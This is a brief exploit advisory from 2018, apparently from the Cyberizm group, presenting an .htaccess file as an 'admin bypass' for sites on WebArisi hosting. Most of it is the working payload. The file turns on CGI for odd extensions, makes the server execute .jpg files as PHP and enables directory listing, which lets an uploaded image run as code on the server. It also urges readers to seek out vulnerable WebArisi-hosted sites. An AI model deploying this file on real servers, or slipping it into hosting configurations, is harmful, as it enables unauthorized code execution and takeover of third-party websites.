#################################################################################################
# Exploit Title : WebArisi Hosting Htaccess File Admin Bypass Exploit
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 21/06/2018
# Vendor Homepage : webarisi.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
#################################################################################################
# Google Dork : No Dork / N/A
Find only vulnerable registered to WebArisi hosted websites.
# Exploit : [ This is .htaccess bypass file ]
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script log cgi pl tg love h4 tgb x-zone
AddType application/x-httpd-php .jpg
RewriteEngine on
RewriteRule (.*)\war$ .log
## END ##
ReadmeName cyberizm.txt
################################################################################################
Reference => cyberizm.org/cyberizm-webarisi-hosting-htaccess-bypass-kodlari.html
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################